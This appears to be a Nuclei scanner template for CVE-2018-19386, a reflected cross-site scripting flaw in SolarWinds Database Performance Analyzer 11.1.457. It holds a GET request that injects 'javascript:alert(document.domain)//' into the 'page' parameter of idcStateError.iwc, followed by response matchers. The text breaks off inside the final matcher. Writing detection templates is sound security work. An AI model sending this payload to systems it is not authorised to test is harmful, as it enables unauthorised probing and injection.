id: cve-2018-19386 info: name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting author: pikpikcu severity: medium # Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/ requests: - method: GET path: - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - '